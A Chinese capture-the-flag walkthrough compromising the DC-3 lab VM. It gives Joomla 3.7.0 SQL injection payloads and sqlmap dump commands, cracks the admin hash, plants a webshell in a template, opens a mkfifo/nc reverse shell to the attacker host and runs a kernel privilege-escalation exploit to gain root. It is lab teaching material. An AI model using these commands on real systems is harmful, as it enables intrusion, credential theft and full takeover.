1.信息收集
通过nmap对局域网进行主机发现扫描,命令如下:
sudo nmap -PS -Pn 192.168.75.0/24
提前查看DC-3的MAC地址,如图:
扫描结果如下,发现该主机IP:
Nmap scan report for 192.168.75.131
Host is up (0.0017s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
80/tcp open http
MAC Address: 00:0C:29:1F:91:04 (VMware)
对目标主机进行全面扫描,以获取开放的端口(服务)以及更多的信息,命令如下:
sudo nmap -Pn -A -p- 192.168.75.131
发现目标系统是Ubuntu,web容器是Apache 2.4.18,使用了Joomla框架,扫描结果如下:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-14 09:32 EDT
Nmap scan report for 192.168.75.131
Host is up (0.023s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open ssl/http Apache/2.4.18 (Ubuntu)
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home
MAC Address: 00:0C:29:1F:91:04 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 23.33 ms 192.168.75.131
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 134.69 seconds
在浏览器中访问该IP地址,如下图:
随便点点发现,不能够注册账号,通过猜测,大概知道管理员的登录界面应该不在这里,因此想到目录爆破,在kali中使用dirbuster工具,在终端输入dirbuster启动图形化界面,并进行如下配置:
(这个字典可能会有遗漏,建议使用2.3 small版本的字典就可以)
生成如下爆破的报告:
DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Fri Aug 14 10:25:49 EDT 2020
--------------------------------
http://192.168.75.131:80
--------------------------------
Directories found during testing:
Dirs found with a 301 response:
/images
/media
/templates
/modules
/bin
/plugins
/includes
/language
/components
/cache
/libraries
/tmp
/layouts
/administrator
/cli
Dirs found with a 200 response:
/
/images/
/media/
/templates/
/modules/
/index.php/
/index.php/2-uncategorised/
/bin/
/plugins/
/includes/
/media/jui/
/media/jui/js/
/language/
/media/system/
/media/system/images/
/media/system/js/
/components/
/media/system/css/
/media/jui/css/
/libraries/
/cache/
/templates/protostar/
/media/jui/fonts/
/templates/protostar/js/
/media/jui/images/
/media/jui/img/
/media/jui/less/
/media/system/css/fields/
/tmp/
/layouts/
/administrator/
/administrator/templates/
/administrator/templates/isis/
/administrator/templates/isis/images/
/administrator/templates/system/
/administrator/templates/isis/images/admin/
/administrator/templates/isis/images/system/
/administrator/templates/hathor/
/cli/
Dirs found with a 500 response:
/index.php/component/users/
Dirs found with a 403 response:
/icons/
--------------------------------
Files found during testing:
Files found with a 200 responce:
/index.php/2-uncategorised/1-welcome
/index.php
/media/jui/js/jquery.min.js
/media/jui/js/jquery-noconflict.js
/media/jui/js/jquery-migrate.min.js
/media/system/js/caption.js
/media/jui/js/bootstrap.min.js
/templates/protostar/js/template.js
/index.php/2-uncategorised
/media/system/js/core.js
/media/system/js/keepalive.js
/media/system/js/punycode.js
/media/system/js/validate.js
/media/system/css/adminlist.css
/media/system/js/html5fallback.js
/media/system/css/calendar-jos.css
/media/jui/css/bootstrap-extended.css
/templates/protostar/js/application.js
/media/jui/fonts/IcoMoon.dev.commented.svg
/media/jui/css/bootstrap-responsive.css
/templates/protostar/js/classes.js
/media/system/css/frontediting.css
/media/jui/fonts/IcoMoon.dev.svg
/media/jui/css/bootstrap-responsive.min.css
/media/system/css/jquery.Jcrop.min.css
/media/jui/fonts/IcoMoon.eot
/media/jui/css/bootstrap-rtl.css
/media/system/css/modal.css
/media/jui/css/bootstrap-tooltip-extended.css
/media/jui/fonts/IcoMoon.svg
/media/system/css/mootree.css
/media/system/css/mootree_rtl.css
/media/jui/css/bootstrap.css
/media/jui/fonts/IcoMoon.ttf
/media/jui/css/bootstrap.min.css
/media/system/css/system.css
/media/jui/fonts/IcoMoon.woff
/media/jui/css/chosen.css
/media/jui/fonts/icomoon-license.txt
/media/jui/css/icomoon.css
/media/jui/css/jquery.minicolors.css
/media/jui/css/jquery.searchtools.css
/media/system/css/fields/calendar-rtl.css
/media/jui/css/jquery.simplecolors.css
/media/system/css/fields/calendar.css
/media/jui/css/sortablelist.css
/administrator/index.php
通过上面的结果,我们好像发现了administrator的目录,在浏览器中尝试一下,发现是管理员登录界面,如图:
接下来的工作就是获得用户名和密码登录进去,但是怎么获取呢?
这里我们需要转换一下思路,我们来分析一下目标主机的基本信息:
首先,系统是Ubuntu,但是目前不知道版本号,接着使用的是Apache 2.4.18,然后使用了Joomla框架搭建的平台。
然后,通过searchsploit命令查找出2.x版本有可利用的漏洞,我们这里先不从web容器展开。
Joomla框架有自己的一个扫描器,叫做JoomScan,我们尝试通过此扫描器获取一些有用的信息,首先我们需要在kali上安装JoomScan,命令如下:
sudo git clone https://github.com/rezasp/joomscan.git
进入joomscan目录:
cd joomscan
执行如下命令对使用了Joomla框架的网站进行扫描:
perl joomscan.pl -u 192.168.75.131
扫描结果如下:
____ _____ _____ __ __ ___ ___ __ _ _
(_ _)( _ )( _ )( \/ )/ __) / __) /__\ ( \( )
.-_)( )(_)( )(_)( ) ( \__ \( (__ /(__)\ ) (
\____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
(1337.today)
--=[OWASP JoomScan
+---++---==[Version : 0.0.7
+---++---==[Update Date : [2018/09/23]
+---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
--=[Code name : Self Challenge
@OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP
Processing http://192.168.75.131 ...
[+] FireWall Detector
[++] Firewall not detected
[+] Detecting Joomla Version
[++] Joomla 3.7.0
[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable
[+] Checking Directory Listing
[++] directory has directory listing :
http://192.168.75.131/administrator/components
http://192.168.75.131/administrator/modules
http://192.168.75.131/administrator/templates
http://192.168.75.131/images/banners
[+] Checking apache info/status files
[++] Readable info/status files are not found
[+] admin finder
[++] Admin page : http://192.168.75.131/administrator/
[+] Checking robots.txt existing
[++] robots.txt is not found
[+] Finding common backup files name
[++] Backup files are not found
[+] Finding common log files name
[++] error log is not found
[+] Checking sensitive config.php.x file
[++] Readable config files are not found
Your Report : reports/192.168.75.131/
这样我们就得到了目标主机Joomla框架的版本3.7.0!
在kali中通过该命令搜索相关漏洞
sudo searchsploit joomla 3.7.0
结果如下
执行如下命令查看漏洞详情:
cat /usr/share/exploitdb/exploits/php/webapps/42033.txt
内容如下:
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917
URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27
Using Sqlmap:
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
Parameter: list[fullordering] (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (DUAL)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)
能够发现该版本的Joomla存在Sql注入漏洞,并给出了存在漏洞的URL链接:
http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27
给出了SqlMap的注入命令:
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
还有存在的Sql注入漏洞的类型,及对应paylaod:
Type: boolean-based blind:布尔盲注
Type: error-based:报错注入
Type: AND/OR time-based blind:延时注入
2.SQL注入漏洞利用
这里我们直接通过Sqlmap来尝试获取数据库信息。
首先,执行如下命令获取数据库名称(建议将--level=5去掉,因为等级5的sqlmap扫描虽然很全面,但是速度很慢):
sqlmap -u "http://192.168.75.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --random-agent --batch --dbs -p list[fullordering]
其中,--random-agent参数的设置可以让Http请求头的user-agent字段随机设置,防止扫描脚本信息的泄露。
--dbs参数,获取所有的数据库名。
--batch参数,无询问执行默认设置。
-p参数,提前指定存在注入的参数,减少运行时间。
--risk参数,
查看运行结果发现得到了所有的数据库名,如下:
[12:05:48] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1
[12:05:49] [INFO] fetching database names
[12:05:49] [INFO] retrieved: 'information_schema'
[12:05:49] [INFO] retrieved: 'joomladb'
[12:05:49] [INFO] retrieved: 'mysql'
[12:05:49] [INFO] retrieved: 'performance_schema'
[12:05:49] [INFO] retrieved: 'sys'
available databases [5]:
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys
很显然,目标网站的数据库名是joomladb,接下来通过如下命令获取指定数据库的所有表名:
sqlmap -u "http://192.168.75.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --random-agent --batch -p list[fullordering] -D "joomladb" --tables
其中,删除了--dbs字段,添加-D "joomladb"和--tables分别是指定数据库名和获取该数据库所有表的作用。执行后得到了所有的表名,如下:
Database: joomladb
[76 tables]
+---------------------+
| #__assets |
| #__associations |
| #__banner_clients |
| #__banner_tracks |
| #__banners |
| #__bsms_admin |
| #__bsms_books |
| #__bsms_comments |
| #__bsms_locations |
| #__bsms_mediafiles |
| #__bsms_message_typ |
| #__bsms_podcast |
| #__bsms_series |
| #__bsms_servers |
| #__bsms_studies |
| #__bsms_studytopics |
| #__bsms_teachers |
| #__bsms_templatecod |
| #__bsms_templates |
| #__bsms_timeset |
| #__bsms_topics |
| #__bsms_update |
| #__categories |
| #__contact_details |
| #__content_frontpag |
| #__content_rating |
| #__content_types |
| #__content |
| #__contentitem_tag_ |
| #__core_log_searche |
| #__extensions |
| #__fields_categorie |
| #__fields_groups |
| #__fields_values |
| #__fields |
| #__finder_filters |
| #__finder_links_ter |
| #__finder_links |
| #__finder_taxonomy_ |
| #__finder_taxonomy |
| #__finder_terms_com |
| #__finder_terms |
| #__finder_tokens_ag |
| #__finder_tokens |
| #__finder_types |
| #__jbsbackup_timese |
| #__jbspodcast_times |
| #__languages |
| #__menu_types |
| #__menu |
| #__messages_cfg |
| #__messages |
| #__modules_menu |
| #__modules |
| #__newsfeeds |
| #__overrider |
| #__postinstall_mess |
| #__redirect_links |
| #__schemas |
| #__session |
| #__tags |
| #__template_styles |
| #__ucm_base |
| #__ucm_content |
| #__ucm_history |
| #__update_sites_ext |
| #__update_sites |
| #__updates |
| #__user_keys |
| #__user_notes |
| #__user_profiles |
| #__user_usergroup_m |
| #__usergroups |
| #__users |
| #__utf8_conversion |
| #__viewlevels |
+---------------------+
[12:10:43] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 93 times
[12:10:43] [INFO] fetched data logged to text files under '/home/kali/.sqlmap/output/192.168.75.131'
[*] ending @ 12:10:43 /2020-08-14/
不难发现,存在一个名为#__users的疑似存储用户信息的表,下面我们开始获取这个表中的字段名,执行如下命令:
sqlmap -u "http://192.168.75.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --random-agent --batch -p list[fullordering] -D "joomladb" -T "#__users" --columns
-T "#__users"和--columns指定表名和及要获取表的字段。
需要注意的是,这里我们要去掉--batch参数,不让它执行默认的选项,因为我们需要进行一些选择,如图:
这样我们就得到了这个表的全部字段,如下:
Database: joomladb
Table: #__users
[6 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | numeric |
| name | non-numeric |
| password | non-numeric |
| email | non-numeric |
| params | non-numeric |
| username | non-numeric |
+----------+-------------+
接下来,就要获取name和password字段的值了,通过如下命令:
sqlmap -u "http://192.168.75.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --random-agent -p list[fullordering] -D "joomladb" -T "#__users" -C "name,password" --dump
其中,-C "name,password"指定要获取哪些字段的值,--dump意思就是将数据脱库,得到信息,结果如下:
Database: joomladb
Table: #__users
[1 entry]
+--------+--------------------------------------------------------------+
| name | password |
+--------+--------------------------------------------------------------+
| admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+--------+--------------------------------------------------------------+
这样,我们就成功地得到了用户名和密码啦!
将密码的hash值存到一个文件中,如图:
通过John命令对该密码进行爆破,命令如下:
sudo john password_hash.txt
运行结束后执行该命令查看爆破结果:
sudo john password_hash.txt --show
结果如图:
这样就得到了用户名密码,可以尝试登录管理后台啦!登录如图:
3.深度扫描
这时我们拿到账密后,就有更多的目录访问权限了,就有很大几率出现更多的漏洞,这时我们使用Web应用扫面器做一次深度扫描,AWVS需要自己去下载,这里就不赘述安装方法了。
启动AWVS,如图:
浏览器访问本地3443端口进入AWVS页面,登入AWVS,如图:
点击targets->add target,添加目标后,点击save保存,如图:
只设置site Login选项,其它不用管,填入刚破解的账密,点击保存并点击scan运行,如图:
点击create scan,开始扫描,如图:
开始漫长的等待....
扫描过程中,我们发现出现了很多高危漏洞,点击红色按钮进行查看,如图:
其中包括SQL注入、XSS、CSRF、文件上传、本地文件包含、目录浏览等等很多,这就为大家提供了一定的思路。
4.获取WebShell
我们随意浏览一下这个网站,进入extentions->templates->templates,点击Beez3,发现进入了一个网站页面管理的界面,如图:
这就为我们提供了新的方向,我们可以写一个一句话木马,点击new File,创建新文件,写入一句话木马,如图:
保存,并想办法执行它。所以我们需要知道joomla上传文件的位置,这种全球流行的框架一定会有固定的目录结构,而且很容易在互联网上搜索到,上传文件的位置是:
http://192.168.75.131/templates/beez3/html/shell.php
我们直接在浏览器中访问该页面,能够发现一句话木马执行成功,如图:
这时通过AntSword工具连接一句话木马,如图:
保存后,右击选择虚拟终端,如图:
ip addr可以看到当前已经进入目标主机系统了,whoami命令查看当前拥有的权限,如图:
此时,我们拿到的WebShell是基于Http协议实现的,它是无状态的链接,无法保持会话,每输入一条命令就会调取一个新的终端来执行,因此无法使用cd来切换目录,所以,我们想到通过反弹Shell来获得持久性连接,输入nc -h发现目标主机中存在nc命令,但是没有-e参数(此参数可以在建立连接之后执行程序),因此无法通过-e参数来反弹Shell,如图:
此时我们使用如下命令来反弹Shell:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc 192.168.75.130 6666 > /tmp/f
首先,rm /tmp/f命令是删除目标主机的/tmp/f文件,然后通过mkfifo /tmp/f命令创建FIFO文件(FIFO,命名管道,如同它的名字[First In First Out-先进先出]一样,这个文件可以通过一端写入数据,然后在另一端同时读取数据,就像一个通道一样),cat /tmp/f命令就是读取该FIFO文件,并通过管道符|将读取结果发送给命令解释器/bin/bash,命令解释器执行了cat /tmp/f读取出来的命令,并将命令的执行结果通过管道符|将命令执行结果扔给后面的nc命令来处理,nc将这些执行结果发送给所连接的远程主机(kali),远程主机就能够在屏幕中看到发送过来的命令执行结果,当然远程主机通过nc将想要执行的命令发送到目标主机(dc-3),这是nc接收到远程主机发送的命令后通过写入符号>将命令写入/tmp/f文件,这样就形成了一个闭环,只要nc不中断连接就能够一直执行命令。
首先,我们在kali中通过nc开启对6666端口的监听,命令如下:
sudo nc -lnvp 6666
如图:
然后在虚拟终端中输入上面讲解的命令,回车后执行结果如图:
反弹Shell成功!
如果大家没有交互式的Shell,可以通过如下命令来调出:
python3 -c 'import pty;pty.spawn("/bin/bash")'
5.提权
提权我们一般需要通过操作系统漏洞来实现,因此需要先获取操作系统的具体版本和内核版本等信息。
uname -a # 获取内核版本信息
Linux DC3VM 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
cat /etc/issue # 获取操作系统版本
Ubuntu 16.04 LTS \n \l
cat /etc/*-release # 获取操作系统版本
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04 LTS"
NAME="Ubuntu"
VERSION="16.04 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
UBUNTU_CODENAME=xenial
得到系统版本和内核信息,如下:
Ubuntu 16.04 4.4.0-21-generic
我们也可以借助Linux提权辅助脚本(linux-exploit-suggester)来进行信息的获取,而且还能够得到版本对应的漏洞信息,github下载地址:
https://github.com/mzet-/linux-exploit-suggester/archive/master.zip
解压后将linux-exploit-suggester.sh通过AntSword上传到目标主机的/tmp目录,然后添加执行权限,如图:
最后在kali中运行该脚本,./linux-exploit-suggester.sh,运行结果如下:
Available information:
Kernel version: 4.4.0
Architecture: i686
Distribution: ubuntu
Distribution version: 16.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
Searching among:
74 kernel space exploits
45 user space exploits
Possible Exploits:
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2016-5195] dirtycow 2
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},[ ubuntu=16.04{kernel:4.4.0-21-generic} ]
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2017-16995] eBPF_verifier
Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Exposure: highly probable
Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
Download URL: https://www.exploit-db.com/download/45010
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2016-8655] chocobo_root
Details: http://www.openwall.com/lists/oss-security/2016/12/06/1
Exposure: highly probable
Tags: [ ubuntu=(14.04|16.04){kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic} ]
Download URL: https://www.exploit-db.com/download/40871
Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled
[+] [CVE-2016-5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2016-4557] double-fdput()
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
Exposure: highly probable
Tags: [ ubuntu=16.04{kernel:4.4.0-21-generic} ]
Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2017-7308] af_packet
Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
Exposure: probable
Tags: [ ubuntu=16.04 ]{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels
[+] [CVE-2017-6074] dccp
Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
Exposure: probable
Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-62-generic}
Download URL: https://www.exploit-db.com/download/41458
Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
[+] [CVE-2017-1000112] NETIF_F_UFO
Details: http://www.openwall.com/lists/oss-security/2017/08/13/1
Exposure: probable
Tags: ubuntu=14.04{kernel:4.4.0-*},[ ubuntu=16.04 ]{kernel:4.8.0-*}
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.c
Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels
[+] [CVE-2019-18634] sudo pwfeedback
Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
Exposure: less probable
Tags: mint=19
Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
Comments: sudo configuration requires pwfeedback to be enabled.
[+] [CVE-2019-15666] XFRM_UAF
Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
Exposure: less probable
Download URL:
Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled
[+] [CVE-2016-9793] SO_{SND|RCV}BUFFORCE
Details: https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793
Exposure: less probable
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793/poc.c
Comments: CAP_NET_ADMIN caps OR CONFIG_USER_NS=y needed. No SMEP/SMAP/KASLR bypass included. Tested in QEMU only
[+] [CVE-2016-2384] usb-midi
Details: https://xairy.github.io/blog/2016/cve-2016-2384
Exposure: less probable
Tags: ubuntu=14.04,fedora=22
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user
[+] [CVE-2016-0728] keyring
Details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/40003
Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working
不难看出,该版本系统存在很多漏洞,这里我们选用这个漏洞来利用:
[+] [CVE-2016-4557] double-fdput()
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
Exposure: highly probable
Tags: [ ubuntu=16.04{kernel:4.4.0-21-generic} ]
Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
根据提示的下载地址,下载EXP,并上传到/tmp目录,如图:
解压后出现两个打了包的文件,如图:
将exploit.tar解包,得到四个文件,如图:
查看compile.sh脚本内容,能够发现它对其他的三个文件进行了编译
cat compile.sh
#!/bin/sh
gcc -o hello hello.c -Wall -std=gnu99 `pkg-config fuse --cflags --libs`
gcc -o doubleput doubleput.c -Wall
gcc -o suidhelper suidhelper.c -Wall
给comiple.sh脚本执行权限,并执行,命令如下:
chmod +x compile.sh;./compile.sh
出现一些警告,不要紧:
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
接下来运行./doubleput,结果如下:
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
这样我们就获得了root权限!
获得交互式Shell,如图:
进入到root目录,我们就能够获得到flag啦!
至此,DC-3的渗透提权过程就结束了,谢谢大家耐心阅读!
